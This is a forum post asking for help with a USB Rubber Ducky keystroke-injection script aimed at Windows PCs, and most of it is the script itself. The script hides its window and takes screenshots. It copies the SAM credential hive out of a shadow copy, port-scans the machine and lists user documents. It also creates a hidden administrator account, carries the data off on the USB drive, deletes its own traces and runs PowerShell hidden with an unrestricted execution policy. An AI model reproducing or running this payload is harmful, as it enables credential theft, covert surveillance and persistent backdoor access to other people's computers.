BlAd373

November 29, 2017

I'm trying to create a script that allows me to recognize some info from a windows PC and save them directly on rubber ducky
it's possible?
what am I wrong with this script?

REM Recon
DELAY 200
GUI r
DELAY 100
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 200
ALT y
DELAY 200
ENTER
ALT SPACE
DELAY 100
STRING m
DELAY 100
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $jpegSaveDir = New-Item $fileSaveDir'\Screenshots' -ItemType Directory
ENTER
STRING $x = 0
ENTER
STRING do { Start-Sleep -Seconds 60
ENTER
STRING $jpegName = (get-date).ToString('HHmmss')
ENTER
STRING $File = "$jpegSaveDir\$jpegName.bmp"
ENTER
STRING Add-Type -AssemblyName System.Windows.Forms
ENTER
STRING Add-type -AssemblyName System.Drawing
ENTER
STRING $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
ENTER
STRING $Width = $Screen.Width
ENTER
STRING $Height = $Screen.Height
ENTER
STRING $Left = $Screen.Left
ENTER
STRING $Top = $Screen.Top
ENTER
STRING $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
ENTER
STRING $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
ENTER
STRING $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
ENTER
STRING $bitmap.Save($File)
ENTER
STRING $x++ } while ($x -ne 8);
ENTER
STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem
ENTER
STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime
ENTER
STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)
ENTER
STRING $SerialNo = $SysSerialNo.SerialNumber
ENTER
STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model
ENTER
STRING $SysManufacturer = $SysInfo.Manufacturer
ENTER
STRING $SysModel = $SysInfo.Model
ENTER
STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption
ENTER
STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"
ENTER
STRING $HD = [math]::truncate($disk.Size / 1GB)
ENTER
STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)
ENTER
STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize
ENTER
STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)
ENTER
STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name
ENTER
STRING $Cpu = $SysCpu.Name
ENTER
STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber
ENTER
STRING $HardSerialNo = $HardSerial.SerialNumber
ENTER
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name
ENTER
STRING $graphicsCard = gwmi win32_VideoController |select Name
ENTER
STRING $graphics = $graphicsCard.Name
ENTER
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1
ENTER
STRING $DriveLetter = $CDDrive.Drive
ENTER
STRING $DriveName = $CDDrive.Caption
ENTER
STRING $Disk = $DriveLetter + '\' + $DriveName
ENTER
STRING $Firewall = New-Object -com HNetCfg.FwMgr
ENTER
STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile
ENTER
STRING $FireProfile = $FireProfile.FirewallEnabled
ENTER
STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"
ENTER
STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired
ENTER
STRING $UserType = $UserInfo.AccountType
ENTER
STRING $UserSid = $UserInfo.SID
ENTER
STRING $UserPass = $UserInfo.PasswordRequired
ENTER
STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')
ENTER
STRING $Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>"
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
ENTER
STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }
ENTER
STRING $addSlash = $shadow.DeviceObject + '\'
ENTER
STRING cmd /c mklink C:\shadowcopy $addSlash
ENTER
STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
ENTER
STRING Remove-Item -recurse -force 'C:\shadowcopy'
ENTER
STRING $Report = $Report + '<div id=center><h3> Installed Updates</h3>'
ENTER
STRING $Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html   Description, HotFixId,Installedon,InstalledBy)
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING $Computer = $env:COMPUTERNAME
ENTER
STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080
ENTER
STRING $Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'
ENTER
STRING foreach ($PortNumber in $PortList) {
ENTER
STRING $PortCheck = New-Object Net.Sockets.TcpClient
ENTER
STRING $PortCheck.Connect($Computer, $PortNumber)
ENTER
STRING if ($PortCheck.Connected) {
ENTER
STRING $Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}
ENTER
STRING else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> '
ENTER
STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate)
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $u = 0
ENTER
STRING $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)
ENTER
STRING $Report = $Report + '<div id=right><h3>USB Devices</h3><table>'
ENTER
STRING do {
ENTER
STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
ENTER
STRING $Report = $Report + "<tr><td>Drive Name: </td><td> " + $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>"
ENTER
STRING Write-Output $fullUSB
ENTER
STRING $u ++
ENTER
STRING } while ($u -lt $allUsb.Count)
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>'
ENTER
STRING $Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING $Report = $Report + '<div id=center><h3>Network Information</h3>'
ENTER
STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'
ENTER
STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING Net User test test1   /ADD
ENTER
STRING Net LocalGroup Administrators test /ADD
ENTER
DELAY 500
STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v test /t REG_DWORD /d 0 /f
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'f:\}' | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'f:\}' | select Name
ENTER
STRING move-item c:\Windows\Report.zip $driveLetter.Name
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 750
STRING C:\Windows\config-86652.ps1
ENTER
DELAY 100
ALT F4
DELAY 100
GUI r
DELAY 200
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 200
ALT y
DELAY 200
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-86652.ps1
ENTER
STRING exit
DELAY 100
ENTER

Sign In

BlAd373

Posts

Joined

Last visited

Content Type

Profiles

Forums

Posts posted by BlAd373

info

Browse

Activity